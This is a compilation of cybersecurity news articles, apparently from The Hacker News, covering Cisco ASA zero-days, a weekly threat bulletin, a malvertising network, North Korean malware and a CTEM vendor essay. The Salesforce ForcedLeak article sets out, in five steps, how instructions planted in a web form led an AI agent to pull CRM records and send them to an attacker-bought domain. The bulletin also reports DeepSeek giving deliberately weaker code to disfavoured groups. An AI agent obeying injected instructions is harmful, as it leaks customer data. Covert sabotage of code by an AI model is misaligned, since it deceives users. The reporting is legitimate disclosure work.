2025-09-26 AI创业新闻

Urgent: Cisco ASA Zero-Day Duo Under Attack; CISA Triggers Emergency Mitigation Directive

Cisco is urging customers to patch two security flaws impacting the VPN web server of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software, which it said have been exploited in the wild. The zero-day vulnerabilities in question are listed below - CVE-2025-20333 (CVSS score: 9.9) - An improper validation of user-supplied input in HTTP(S) requests vulnerability that could allow an authenticated, remote attacker with valid VPN user credentials to execute arbitrary code as root on an affected device by sending crafted HTTP requests CVE-2025-20362 (CVSS score: 6.5) - An improper validation of user-supplied input in HTTP(S) requests vulnerability that could allow an unauthenticated, remote attacker to access restricted URL endpoints without authentication by sending crafted HTTP requests Cisco said it’s aware of “attempted exploitation” of both vulnerabilities, but did not reveal who may be behind it, or how widespread the attacks are. It’s suspected that the two vulnerabilities are being chained to bypass authentication and execute malicious code on susceptible appliances. It also credited the Australian Signals Directorate, Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security, U.K.

National Cyber Security Centre (NCSC), and U.S. Cybersecurity and Infrastructure Security Agency (CISA) for supporting the investigation. CISA Issues Emergency Directive ED 25-03 In a separate alert, CISA said it’s issuing an emergency directive urging federal agencies to identify, analyze, and mitigate potential compromises with immediate effect. In addition, both vulnerabilities have been added to the Known Exploited Vulnerabilities (KEV) catalog, giving the agencies 24 hours to apply the necessary mitigations.

“CISA is aware of an ongoing exploitation campaign by an advanced threat actor targeting Cisco Adaptive Security Appliances (ASA),” the agency noted . “The campaign is widespread and involves exploiting zero-day vulnerabilities to gain unauthenticated remote code execution on ASAs, as well as manipulating read-only memory (ROM) to persist through reboot and system upgrade. This activity presents a significant risk to victim networks.” The agency also noted that the activity is linked to a threat cluster dubbed ArcaneDoor , which was previously identified as targeting perimeter network devices from several vendors, including Cisco, to deliver malware families like Line Runner and Line Dancer. The activity was attributed to a threat actor dubbed UAT4356 (aka Storm-1849).

“This threat actor has demonstrated a capability to successfully modify ASA ROM at least as early as 2024,” CISA added. “These zero-day vulnerabilities in the Cisco ASA platform are also present in specific versions of Cisco Firepower. Firepower appliances’ Secure Boot would detect the identified manipulation of the ROM.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Threatsday Bulletin: Rootkit Patch, Federal Breach, OnePlus SMS Leak, TikTok Scandal & More

Welcome to this week’s Threatsday Bulletin —your Thursday check-in on the latest twists and turns in cybersecurity and hacking. The digital threat landscape never stands still. One week it’s a critical zero-day, the next it’s a wave of phishing lures or a state-backed disinformation push. Each headline is a reminder that the rules keep changing and that defenders—whether you’re protecting a global enterprise or your own personal data—need to keep moving just as fast.

In this edition we unpack fresh exploits, high-profile arrests, and the newest tactics cybercriminals are testing right now. Grab a coffee, take five minutes, and get the key insights that help you stay a step ahead of the next breach. Firmware fights back SonicWall Releases SMA 100 Firmware Update to Remove Rootkit SonicWall has released a firmware update that it said will help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices. “SonicWall SMA 100 10.2.2.2-92sv build has been released with additional file checking, providing the capability to remove known rootkit malware present on the SMA devices,” the company said .

“SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the 10.2.2.2-92sv version.” The update comes after a report from Google that found a threat actor tracked as UNC6148 deploying OVERSTEP malware on end-of-life (EoL) SonicWall SMA 100 devices. SonicWall has also disclosed that expediting the end-of-support (EoS) date for all SMA 100 devices to October 31, 2025, citing “significant vulnerabilities presented by legacy VPN appliances.” Texts laid bare Unpatched Flaw in OnePlus Phones Lets Malicious Apps Access Text Messages A permission bypass vulnerability (CVE-2025-10184, CVSS score: 8.2) has been discovered in multiple versions of OnePlus OxygenOS installed on its Android devices. The shortcoming has to do with the fact that sensitive internal content providers are accessible without permission, and are vulnerable to SQL injection. “When leveraged, the vulnerability allows any application installed on the device to read SMS/MMS data and metadata from the system-provided Telephony provider (the package com.android.providers.telephony) without permission, user interaction, or consent,” Rapid7 said .

“The user is also not notified that SMS data is being accessed.” Successful exploitation of the flaw could lead to the theft of sensitive information, such as multi-factor authentication (MFA) codes sent as SMS messages. The issue appears to have been introduced as part of OxygenOS 12, released in 2021. The vulnerability remains unpatched as of writing, but OnePlus has acknowledged it’s investigating the issue. Stop Guessing, Start Securing Webinar: Code-to-Cloud Visibility Is the New AppSec Baseline Join this session to discover why code-to-cloud visibility is fast becoming the cornerstone of modern Application Security Posture Management (ASPM).

You’ll see how mapping risks from where they originate in code to where they surface in the cloud unites development, DevOps, and security teams , enabling sharper prioritization, tighter feedback loops, and faster remediation—before attackers can exploit the weak link. GeoServer hole exploited CISA says Hackers Breached Federal Agency Using GeoServer Exploit The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a comprehensive cybersecurity advisory detailing how threat actors successfully compromised a U.S. federal civilian executive branch agency’s network on July 11, 2024, by exploiting CVE-2024-36401 , a critical remote code execution vulnerability in GeoServer.

“Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers,” the agency said . Once compromised, the attackers uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living-off-the-land (LotL) techniques for user, service, filesystem, and network discovery, while relying on tools like fscan, dirtycow, and RingQ for network reconnaissance, privilege escalation, and defense evasion, respectively. SIM-swapping secrets spill Confessions of Scattered Spider’s Noah Urban Last week, three members of the notorious cybercrime group Scattered Spider were arrested.

The arrests came close on the heels of the crew announcing that it was shuttering its operations. The group, composed of primarily English-speaking teenagers, are known to carry out hacking sprees using advanced social engineering tactics to breach high-profile companies, steal data, and extort them. Earlier this year, Noah Urban, a 20-year-old linked to the notorious group, pled guilty to his cybercrime charges and agreed to pay millions in restitution. In a report published last week, Bloomberg revealed his critical role as a caller, talking people into unwittingly giving them access to sensitive computer systems by installing remote access tools.

He also said he found a SIM-swapping group through Minecraft, the leader of which paid him $50 each time a call resulted in a cryptocurrency theft. Urban also said one of the collaborators, Daniel Junk, figured out a way to access T-Mobile’s customer service portal by registering his personal computer to its corporate network and using remote access software to get into the company’s SIM activation tool. Junk is said to have paid Urban to call T-Mobile stores and deceive staff into handing over their logins by claiming to be from the internal security management. Soon Urban graduated to employing his own callers to conduct SIM swapping and used fake Okta login pages masquerading to trick a Twilio employee into sending their credentials.

But when that account didn’t have the data he wanted, he logged into the employee’s Slack account and messaged a senior employee he’d identified on LinkedIn, asking them to send customer data belonging to 209 companies for auditing purposes. The information was subsequently used to hack more companies. In December 2022, the group also stole the personal information of 5.7 million customers of Gemini Trust and put it up for sale. This activity cluster came to be known as 0ktapus .

The threat group would eventually join hands with other entities like LAPSUS$ and Scattered Spider to breach Crypto.com and exploit a United Parcel Service Inc. system to gather the personal data of would-be victims. Urban’s home was raided by U.S. authorities in March 2023, and he was eventually arrested in January 2024.

Last month, he was sentenced to ten years in prison. “I’m not saying what I did was a good thing, it’s a horrible community, and what I did was bad,” he told Bloomberg. “But I loved my life. I like who I am.

I’m glad I was able to live life as I lived it.” Stealthy SVG stings Oversized SVG Files Used to Deliver AsyncRAT Threat actors are using booby-trapped SVG files in an email phishing campaign targeting users in Colombia, Mexico, and Peru as a delivery vector to stealthily deliver malware like AsyncRAT by means of a password-protected ZIP archive. The oversized SVG files contain the “full package,” eliminating the need for external connections to a remote server in order to send commands to compromised devices or download additional malicious payloads. “Attackers also appear to rely at least partly on artificial intelligence (AI) tools to help them generate customized files for every target,” ESET said . “The ability of SVG lures to carry scripts, embedded links and interactive elements makes them ripe for abuse, all while increasing the odds of evading detection by some traditional security tools.” Right-to-left ruse BiDi Swap Leads to URL Spoofing A decade-old vulnerability can open the door to URL spoofing by exploiting how browsers handle Right-to-Left (RTL) and Left-to-Right (LTR) scripts, thereby allowing attackers to craft URLs that appear trustworthy but actually lead to a different destination.

The attack has been codenamed BiDi Swap by Varonis. While punycode homograph attacks and RTL override (RLO) exploits have long been abused to deceive users and browsers into displaying deceptive text or URLs, BiDi Swap entails crafting domains that have LTR sub-domain with some RTL parameters to spoof legitimate sites. Self-replicating supply-chain menace CISA Releases Alert on Shai-Hulud Attack CISA has published an advisory on the recent widespread supply chain compromise targeting the npm ecosystem that involved the use of a self-replicating worm named Shai-Hulud to steal credentials and propagate the malware to other packages. The malware “leveraged an automated process to rapidly spread by authenticating to the npm registry as the compromised developer, injecting code into other packages, and publishing compromised versions to the registry,” CISA said .

The agency is urging organizations to conduct a dependency review, pin npm package dependency versions to known safe releases, rotate all developer credentials, mandate phishing-resistant multi-factor authentication (MFA) on all developer accounts, monitor for anomalous network behavior, harden GitHub security by removing unnecessary GitHub Apps and OAuth applications, and enable branch protection rules. “The Shai-Hulud worm represents a significant escalation in the ongoing series of NPM attacks targeting the open-source community,” Palo Alto Networks Unit 42 said . “Its self-replicating design is particularly notable, effectively combining credential harvesting with an automated dissemination mechanism that exploits maintainers’ existing publishing rights to proliferate across the ecosystem.” Game patch turns thief BlockBlasters Game Delivers StealC Malware A 2D platformer game called BlockBlasters has begun to exhibit signs of malicious activity after a patch release on August 30, 2025, that silently captures system information, a list of installed security products, and cryptocurrency wallet browser extensions, and drops the StealC information stealer while the user is playing the game. This patch affects hundreds of players who currently have the game installed on their systems, G DATA said .

The game has since been pulled from Steam. Database door unlocked Exposed Oracle DBS Server Used to Drop Elons Ransomware Threat actors have been observed exploiting an exposed Oracle DBS database server to execute commands remotely and create an encrypted tunnel with a command-and-control (C2) server to ultimately deploy Elons, a likely variant of the Proxima/ Blackshadow ransomware that appeared in early 2024. It’s suspected that the attackers used an encrypted tunnel with a C2 server for network communication, Yarix said . Remote tool turned spy Malicious ScreenConnect Installers Delivers AsyncRAT Trojanized ScreenConnect installers are being used to distribute AsyncRAT and a custom PowerShell RAT as part of an ongoing campaign designed to facilitate data theft and long-term access.

An analysis of the various IP addresses associated with AsyncRAT activity has revealed a “resilient, evasive AsyncRAT malicious infrastructure maintained for long-term operations rather than opportunistic attacks,” Hunt.io said . Basic ransomware, big chaos West Sussex Man Arrested in Connection with Cyber Attack Affecting Airports A man in his forties from West Sussex has been arrested in connection with a cyber attack that disrupted day-to-day operations at several European airports including Heathrow. The U.K. National Crime Agency (NCA) said he has been released on conditional bail.

“Although this arrest is a positive step, the investigation into this incident is in its early stages and remains ongoing,” Deputy Director Paul Foster, head of the NCA’s National Cyber Crime Unit, said . The agency did not name the suspect or say whether he acted alone or as part of a wider cybercriminal group. The incident caused hundreds of flight delays after Collins Aerospace baggage and check-in software used by several airlines failed. RTX Corporation, the owner of Collins Aerospace, said ransomware had been deployed in the attack.

Although the company did not share any other details regarding the incident, cybersecurity researcher Kevin Beaumont said the attackers used an “incredibly basic” ransomware variant called HardBit . Fake mirrors hook devs PyPI Warns About Continued Phishing Attacks The maintainers of the Python Package Index (PyPI) have warned of continued phishing attacks that employ domain-confusion and legitimate-looking emails to trick accountholders into parting with their credentials by tricking them to click on fake links (“pypi-mirror.org”) under the pretext of verifying their email address for “account maintenance and security procedures” or risk getting their accounts suspended. Package maintainers are advised to change their passwords with immediate effect if they have already clicked on the link and provided their login information. It’s also advised to check the account’s Security History for any suspicious activity.

French dark market falls France Seizes Dark French Anti System Law enforcement authorities in French have shut down a dark web marketplace catering to French-speaking users. The Dark French Anti System, or DFAS, was established in 2017 and had more than 12,000 registered users, emerging as a major hub for peddling drugs, arms, hacking tools, money-laundering schemes, and other criminal services. Authorities took control of servers and arrested two suspects, one who is alleged to be the site’s chief administrator and an accomplice who helped in the testing of its services. Global sting hauls millions INTERPOL Announces $439 million Recovery An INTERPOL-coordinated operation spanning 40 countries and territories led to the recovery of USD 342 million in government-backed currencies, along with USD 97 million in physical and virtual assets.

The operation, dubbed HAECHI-VI, took place between April and August 2025, and targeted seven types of cyber-enabled financial crimes: voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise and e-commerce fraud. As part of the ongoing effort , authorities blocked over 68,000 associated bank accounts, froze close to 400 cryptocurrency wallets, and recovered around $16 million in suspected illicit profits from cryptocurrency wallets. In addition, Portuguese law enforcement broke up a syndicate that diverted funds meant to support vulnerable families, leading to the arrest of 45 suspects who illegally accessed social security accounts and altered bank details that resulted in $270,000 stolen from 531 victims. Thai officials also seized $6.6 million in stolen assets in connection with a sophisticated business email compromise scam conducted by a transnational organized crime group comprising Thai and West African nationals.

“The gang deceived a major Japanese corporation into transferring funds to a fictitious business partner based in Bangkok,” INTERPOL said . Kids’ data under spotlight TikTok Comes Under Scrutiny in Canada for Collecting Children Data The popular social media app TikTok has been collecting sensitive information from hundreds of thousands of Canadians under 13 years old, according to a joint investigation by privacy authorities. However, “as a result of TikTok’s inadequate age-assurance measures, the company collected the personal information of a large number of Canadian children, including information that the offices consider to be sensitive,” the report said . The probe also found TikTok failed to adequately explain its collection and use of biometric information, such as facial and voice data, for video, image and audio analysis.

The privacy commissioners said TikTok agreed to enhance its age verification and provide up-front notices about its wide-ranging collection of data. The company also agreed to “effectively stop” allowing advertisers to target users under the age of 18, except based on broad categories such as language and approximate location. AI turbocharges vulnerabilities AI Coding Assistants Ship With More Risks A new report from Apiiro has found that software development teams using artificial intelligence (AI)-powered coding assistants have introduced “over 10,000 new security findings per month across repositories,” a 10× spike from December 2024. “These flaws span every category of application risk — from open-source dependencies to insecure coding patterns, exposed secrets, and cloud misconfigurations,” Apiiro said .

“AI is multiplying not one kind of vulnerability, but all of them at once.” The study also found that while syntax errors in AI-written code dropped by 76% and logic bugs declined by more than 60%, privilege escalation paths jumped 322%, and architectural design flaws increased 153%. In addition, AI-assisted developers exposed cloud-related API keys and service principals nearly twice as often as their non-AI peers. Shortcut to bypass security LNK Stomping Detailed In September 2024, Microsoft issued patches for a Windows Mark-of-the-Web (MotW) security feature bypass vulnerability tracked as CVE-2024-38217. Also called LNK Stomping , the flaw exploits the manner Windows shortcut (LNK) files are handled to remove the MotW tag and bypass security protections.

According to Elastic, there are indications that the issue has been exploited as far back as February 2018, long before it was publicly documented. “LNK Stomping is an attack that manipulates the actual execution program path of a Windows shortcut file (.lnk) with an abnormal target path or internal structure,” South Korean cybersecurity company ASEC said . “It then prompts explorer.exe to remove the MoTW metadata during the ‘normalization (Canonicalization)’ process, thereby bypassing security checks.” BankBot strikes Southeast Asia Indonesian and Vietnamese Android Users Targeted by Banking Trojans DomainTools revealed that Indonesian and Vietnamese Android users have been targeted by banking trojans disguised as legitimate payment and government identity applications since August 2024. “The operators exhibit distinct domain registration patterns, often reusing TLS certificates and grouping domains to resolve to the same IP addresses, with a strong operational focus during Eastern Asia’s daytime hours,” the company said .

It’s suspected that the threat actors are using spoofed websites imitating the Google Play Store to trick users into installing fraudulent APK files that drop a banking trojan named BankBot , which had its source code leaked on Russian-language forums in 2016. Over 100 domains have been identified as being used for malware distribution. Russian influence playbook New Disinformation Campaign Targeting 2025 Moldovan Elections A state-backed threat actor with ties to Russian is targeting the upcoming 2025 Moldovan elections with a disinformation campaign, setting up fake news sites to publish articles that amplify narratives attempting to dissuade Moldova from further aligning with the European Union and exhibit bias against the current leadership. The multi-year activity is tracked under the name Storm-1679 (aka Matryoshka).

Silent Push said it identified “technical fingerprints” linking the efforts to a Russian news site named Absatz. It also found commonalities between multiple disinformation websites, suggesting “infrastructure reuse and common ownership across this campaign.” This includes the use of two IP addresses – 95.181.226[.]135 and 91.218.228[.]51 – which have been used to host domains in connection with a Russian disinformation effort dating back to 2022. “When searching for the Russian word for Moldova (‘Молдова’) on Absatz (absatz[.]media/search), there are dozens of clear disinformation articles,” Silent Push said. Sabotage by algorithm DeepSeek Produces Less Secure Code for Groups China Disfavors In new research published by CrowdStrike, it has been found that Chinese artificial intelligence engine DeepSeek either often refuses to help programmers or gives them low-quality code or code containing major security flaws when they say they are working for the banned spiritual movement Falun Gong or other groups considered sensitive by the Chinese government.

“Deliberately producing flawed code can be less noticeable than inserting back doors – secret means of access for unauthorized users, including governments — while producing the same result: making targets easy to hack,” The Washington Post reported . That wraps up this week’s Threatsday Bulletin. Use these stories as a prompt to double-check your own defenses: apply the urgent updates, tighten access controls, and talk with colleagues about what these incidents mean for your environment. Every small action today helps prevent a big incident tomorrow.

👉 Stay in the loop: Sign up for our newsletter for real-time updates and next week’s highlights. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Vane Viper Generates 1 Trillion DNS Queries to Power Global Malware and Ad Fraud Network

The threat actor known as Vane Viper has been outed as a purveyor of malicious ad technology (adtech), while relying on a tangled web of shell companies and opaque ownership structures to deliberately evade responsibility. “Vane Viper has provided core infrastructure in widespread malvertising, ad fraud, and cyberthreat proliferation for at least a decade,” Infoblox said in a technical report published last week in collaboration with Guardio and Confiant. “Vane Viper not only brokers traffic for malware droppers and phishers, but appears to run their own campaigns, consistent with previously documented ad-fraud techniques.” Vane Viper, also called Omnatuor , was previously documented by the DNS threat intelligence firm in August 2022, describing it as a malvertising network akin to VexTrio Viper that takes advantage of vulnerable WordPress sites to build a massive network of compromised domains and use them to spread riskware, spyware, and adware. One of the notable aspects of the threat actor’s persistence techniques is the abuse of push notification permissions to serve ads even after the user navigates away from the initial page by altering browser settings.

This approach relies on service workers , which maintain a persistent headless browser process to listen for events and serve unwanted notifications. Late last year, Guardio Labs laid bare a campaign dubbed DeceptionAds that was found to leverage Vane Viper’s malicious ad network to facilitate ClickFix-style social engineering campaigns. The activity was attributed to a company named Monetag, which, according to Infoblox, is a subsidiary of PropellerAds , a commercial ad technology company that, in turn, is a subsidiary of AdTech Holding, a holding company based in Cyprus. Domains linked to ProperllerAds have long been flagged for facilitating malvertising campaigns and driving traffic to exploit kits or other fraudulent sites .

Further analysis has uncovered evidence suggesting that several ad-fraud campaigns have originated from infrastructure attributed to PropellerAds. The cybersecurity company said Vane Viper has accounted for about 1 trillion DNS queries over the past year in about half of its customer networks, adding the threat actor takes advantage of hundreds of thousands of compromised websites and malicious ads that redirect unsuspecting site users to malicious browser extensions, fake shopping sites, adult content, survey scams, fake apps, sketchy software downloads, and malware, including an Android malware called Triada in one case. What’s more, Vane Viper appears to share infrastructure and personnel ties with URL Solutions (aka Pananames), Webzilla, and XBT Holdings, with the former also linked to disinformation sites set up by a Russian influence operation called Doppelgänger . Some of the other companies owned by AdTech Holding include ProPushMe, Zeydoo, Notix, and Adex.

About 60,000 domains are assessed to be part of Vane Viper’s infrastructure, most of which only remain active for less than a month. However, there are a few domains that have been active for over 1,200 days, including the original omnatuor[.]com, propeller-tracking[.]com, and several others centered around push notification services. The operation has been found to register vast numbers of new domains each month, scaling a high of 3,500 domains in the month of October 2024 alone, a significant jump from less than 500 domains registered in April 2023. Vane Viper domains make up nearly 50% of bulk-registered domains via URL Solutions since 2023, per the company.

PropellerAds, however, has previously denied any wrongdoing, stating it’s “nothing more than an automated intermediary to help advertisers find the best publishers to publish their advertisements,” and that it “does not endorse, support, or encourage any malicious advertisement on its network.” “Vane Viper isn’t just a threat actor hiding behind an adtech platform,” Infoblox noted. “It’s a threat actor as an adtech platform. AdTech Holding claims to offer advertisers reach and monetization at scale, but what it actually delivers is risk.” “Vane Viper hides behind the plausible deniability of operating as an advertising network, while using their TDS [traffic distribution system] to deliver multiple kinds of threats.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Securing AI Agents 101

Salesforce Patches Critical ForcedLeak Bug Exposing CRM Data via AI Prompt Injection

Cybersecurity researchers have disclosed a critical flaw impacting Salesforce Agentforce , a platform for building artificial intelligence (AI) agents, that could allow attackers to potentially exfiltrate sensitive data from its customer relationship management (CRM) tool by means of an indirect prompt injection. The vulnerability has been codenamed ForcedLeak (CVSS score: 9.4) by Noma Security, which discovered and reported the problem on July 28, 2025. It impacts any organization using Salesforce Agentforce with the Web-to-Lead functionality enabled. “This vulnerability demonstrates how AI agents present a fundamentally different and expanded attack surface compared to traditional prompt-response systems,” Sasi Levi, security research lead at Noma, said in a report shared with The Hacker News.

One of the most severe threats facing generative artificial intelligence (GenAI) systems today is indirect prompt injection , which occurs when malicious instructions are inserted into external data sources accessed by the service, effectively causing it to generate otherwise prohibited content or take unintended actions. The attack path demonstrated by Noma is deceptively simple in that it coaxes the Description field in Web-to-Lead form to run malicious instructions by means of a prompt injection, allowing a threat actor to leak sensitive data and exfiltrate it to a Salesforce-related allowlisted domain that had expired and become available for purchase for as little as $5. This takes place over five steps - Attacker submits Web-to-Lead form with a malicious Description Internal employee processes lead using a standard AI query to process incoming leads Agentforce executes both legitimate and hidden instructions System queries CRM for sensitive lead information Transmit the data to the now attacker-controlled domain in the form of a PNG image “By exploiting weaknesses in context validation, overly permissive AI model behavior, and a Content Security Policy (CSP) bypass, attackers can create malicious Web-to-Lead submissions that execute unauthorized commands when processed by Agentforce,” Noma said. “The LLM, operating as a straightforward execution engine, lacked the ability to distinguish between legitimate data loaded into its context and malicious instructions that should only be executed from trusted sources, resulting in critical sensitive data leakage.” Salesforce has since re-secured the expired domain, rolled out patches that prevent output in Agentforce and Einstein AI agents from being sent to untrusted URLs by enforcing a URL allowlist mechanism.

“Our underlying services powering Agentforce will enforce the Trusted URL allowlist to ensure no malicious links are called or generated through potential prompt injection,” the company said in an alert issued earlier this month. “This provides a crucial defense-in-depth control against sensitive data escaping customer systems via external requests after a successful prompt injection.” Besides applying Salesforce’s recommended actions to enforce Trusted URLs, users are recommended to audit existing lead data for suspicious submissions containing unusual instructions, implement strict input validation to detect possible prompt injection, and sanitize data from untrusted sources. “The ForcedLeak vulnerability highlights the importance of proactive AI security and governance,” Levi said. “It serves as a strong reminder that even a low-cost discovery can prevent millions in potential breach damages.” Found this article interesting?

North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers

The North Korea-linked threat actors associated with the Contagious Interview campaign have been attributed to a previously undocumented backdoor called AkdoorTea, along with tools like TsunamiKit and Tropidoor. Slovak cybersecurity firm ESET, which is tracking the activity under the name DeceptiveDevelopment, said the campaign targets software developers across all operating systems, Windows, Linux, and macOS, particularly those involved in cryptocurrency and Web3 projects. It’s also referred to as DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, and Void Dokkaebi. “DeceptiveDevelopment’s toolset is mostly multi-platform and consists of initial obfuscated malicious scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET,” ESET researchers Peter Kálnai and Matěj Havránek said in a report shared with The Hacker News.

The campaign essentially involves the impersonated recruiters offering what appear to be lucrative job roles over platforms like LinkedIn, Upwork, Freelancer, and Crypto Jobs List. After initial outreach, should the prospective target express interest in the opportunity, they are either asked to complete a video assessment by clicking on a link or a coding exercise. The programming assignment requires them to clone projects hosted on GitHub, which silently install malware. On the other hand, websites explicitly set up for undertaking the so-called video assessment display non-existent errors related to camera or microphone access being blocked, and urge them to follow ClickFix-style instructions to rectify the problem by either launching the command prompt or the Terminal app, depending on the operating system used.

Irrespective of the method employed, the attacks have been generally found to deliver several pieces of malware such as BeaverTail, InvisibleFerret , OtterCookie , GolangGhost (aka FlexibleFerret or WeaselStore), and PylangGhost . “WeaselStore’s functionality is quite similar to both BeaverTail and InvisibleFerret, with the main focus being exfiltration of sensitive data from browsers and cryptocurrency wallets,” ESET said. “Once the data has been exfiltrated, WeaselStore, unlike traditional infostealers, continues to communicate with its C&C [command-and-control] server, serving as a RAT capable of executing various commands.” Also deployed as part of these infection sequences are TsunamiKit , PostNapTea, and Tropidoor , the first of which is a malware toolkit delivered by InvisibleFerret and is designed for information and cryptocurrency theft. The use of TsunamiKit was first discovered in November 2024.

The toolkit comprises several components, the starting point being the initial stage TsunamiLoader that triggers the execution of an injector (TsunamiInjector), which, in turn, drops TsunamiInstaller and TsunamiHardener. While TsunamiInstaller acts as a dropper for TsunamiClientInstaller, which then downloads and executes TsunamiClient, TsunamiHardener is responsible for setting up persistence for TsunamiClient, as well as configuring Microsoft Defender exclusions. TsunamiClient is the core module that incorporates a .NET spyware and drops cryptocurrency miners like XMRig and NBMiner. It’s believed that TsunamiKit is likely a modification of a dark web project rather than a native creation of the threat actor, given that samples related to the toolkit have been uncovered dating back to December 2021, predating the onset of Contagious Interview, which is believed to have commenced sometime in late 2022.

The BeaverTail stealer and downloader has also been found to act as a distribution vehicle for another malware known as Tropidoor that, according to ASEC, overlaps with a Lazarus Group tool called LightlessCan . ESET said it found evidence of Tropidoor artifacts uploaded to VirusTotal from Kenya, Colombia, and Canada, adding the malware also shares “large portions of code” with PostNapTea , a malware used by the threat actor against South Korean targets in 2022. PostNapTea supports commands for configuration updates, file manipulation and screen capturing, file system management, process management, and running custom versions of Windows commands like whoami, netstat, tracert, lookup, ipconfig, and systeminfo, among others, for improved stealth – a feature also present in LightlessCan. “Tropidoor is the most sophisticated payload yet linked to the DeceptiveDevelopment group, probably because it is based on malware developed by the more technically advanced threat actors under the Lazarus umbrella,” ESET said.

Execution chain of WeaselStore The latest addition to the threat actor’s arsenal is a remote access trojan dubbed AkdoorTea that’s delivered by means of a Windows batch script. The script downloads a ZIP file (“nvidiaRelease.zip”) and executes a Visual Basic Script present in it, which then proceeds to launch BeaverTail and AkdoorTea payloads also contained in the archive. It’s worth pointing out that the campaign has leveraged NVIDIA-themed driver updates in the past as part of ClickFix attacks to address supposed camera or microphone issues when providing the video assessments, indicating that this approach is being used to propagate AkdoorTea. AkdoorTea gets its name from the fact that it shares commonalities with Akdoor , which is described as a variant of the NukeSped (aka Manuscrypt ) implant – further reinforcing Contagious Interview’s connections to the larger Lazarus Group umbrella .

“DeceptiveDevelopment’s TTPs illustrate a more distributed, volume-driven model of its operations. Despite often lacking technical sophistication, the group compensates through scale and creative social engineering,” ESET said. “Its campaigns demonstrate a pragmatic approach, exploiting open-source tooling, reusing available dark web projects, adapting malware probably rented from other North Korea-aligned groups, and leveraging human vulnerabilities through fake job offers and interview platforms.” Contagious Interview doesn’t operate in silo, as it has been also found to share some level of overlaps with Pyongyang’s fraudulent IT worker scheme (aka WageMole), with Zscaler noting that the intelligence gleaned from the former is used by North Korean actors to secure jobs at those companies using stolen identities and fabricating synthetic personas . The IT worker threat is believed to have been ongoing since 2017 .

Connection between Contagious Interview and WageMole Cybersecurity company Trellix, in a report published this week, said it uncovered an instance of a North Korean IT worker employment fraud targeting a U.S. healthcare company, where an individual using the name “Kyle Lankford” applied for a Principal Software Engineer position. While the job applicant did not raise any red flags during the early stages of the hiring process, Trellix said it was able to correlate their email addresses with known North Korea IT worker indicators. Further analysis of the email exchanges and background checks identified the candidate as a likely North Korean operative, it added.

“The activities of North Korean IT workers constitute a hybrid threat,” ESET noted. “This fraud-for-hire scheme combines classical criminal operations, such as identity theft and synthetic identity fraud, with digital tools, which classify it as both a traditional crime and a cybercrime (or e-crime).” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

CTEM’s Core: Prioritization and Validation

Despite a coordinated investment of time, effort, planning, and resources, even the most up-to-date cybersecurity systems continue to fail. Every day. Why? It’s not because security teams can’t see enough.

Quite the contrary. Every security tool spits out thousands of findings. Patch this. Block that.

Investigate this. It’s a tsunami of red dots that not even the most crackerjack team on earth could ever clear. And here’s the other uncomfortable truth: Most of it doesn’t matte r. Fixing everything is impossible.

Trying to is a fool’s errand. Smart teams aren’t wasting precious time running down meaningless alerts. They understand that the hidden key to protecting their organization is knowing which exposures are actually putting the business at risk. That’s why Gartner introduced the concept of Continuous Threat Exposure Management and put prioritization and validation at the heart of it.

It’s not about more dashboards or prettier charts. It’s about narrowing focus and taking the fight to the handful of exposures that actually matter and proving your defenses will actually hold up when and where they really need to. The Problem with Traditional Vulnerability Management Vulnerability management was built on a simple premise: Find every weakness, rank it, then patch it. On paper, it sounds logical and systematic.

And there was a time when it made perfect sense. Today, however, facing an unprecedented and constant barrage of threats, it’s a treadmill not even the fittest team can keep up with. Each year, over 40,000 Common Vulnerabilities and Exposures (CVEs) hit the wire. Scoring systems like CVSS and EPSS dutifully stamp 61% of them as “critical.” That’s not prioritization, it’s panic at scale.

These labels don’t care if the bug is buried behind three layers of authentication, blocked by existing controls, or practically unexploitable in your specific environment. As far as they’re concerned, a threat is a threat. Figure 1: Projected Vulnerability Volume So teams grind themselves down chasing ghosts. They burn cycles on vulnerabilities that will never be used in an attack, while a handful of the ones that do matter slip through, unnoticed.

It’s security theater masquerading as risk reduction. In reality, the actual risk scenario looks very different. Once you factor in existing security controls, only around 10% of real world vulnerabilities are truly critical. Which means that 84% of so-called “critical” alerts amount to false urgency , again draining time, budget, and focus that could, and should, be spent on real threats.

Enter Continuous Threat Exposure Management (CTEM) Continuous Threat Exposure Management (CTEM) was developed to end the never-ending treadmill. Instead of drowning teams in theoretical “critical” findings, it replaces volume with clarity through two essential steps . Prioritization ranks exposures by real business impact, not abstract severity scores. Validation pressure-tests those prioritized exposures against your specific environment, uncovering which ones attackers can actually exploit.

One without the other fails. Prioritization alone is just educated guesswork. Validation alone wastes cycles on hypotheticals and the wrong issues. But together they convert assumptions into evidence and endless lists into focused, realistic action.

Figure 2: CTEM in Action And the scope goes far beyond CVEs. As Gartner predicts , by 2028, more than half of exposures will stem from nontechnical weaknesses like misconfigured SaaS apps, leaked credentials, and human error. Happily, CTEM addresses this head-on, applying the same disciplined prioritize-then-validate action chain across every kind of exposure. That’s why CTEM isn’t just a framework.

It’s a necessary evolution from chasing alerts to proving risk , and from fixing everything to fixing what matters most . Automating Validation with Adversarial Exposure Validation (AEV) Technologies CTEM demands validation, but validation requires finesse and adversarial context, which Adversarial Exposure Validation (AEV) technologies deliver. They help further cut through inflated “priority” lists and prove in practice which exposures will actually open the door to attackers. Two technologies drive this automation: Breach and Attack Simulation (BAS) continuously and safely simulates and emulates adversarial techniques like ransomware payloads, lateral movement, and data exfiltration to verify whether your specific security controls will actually stop what they’re supposed to.

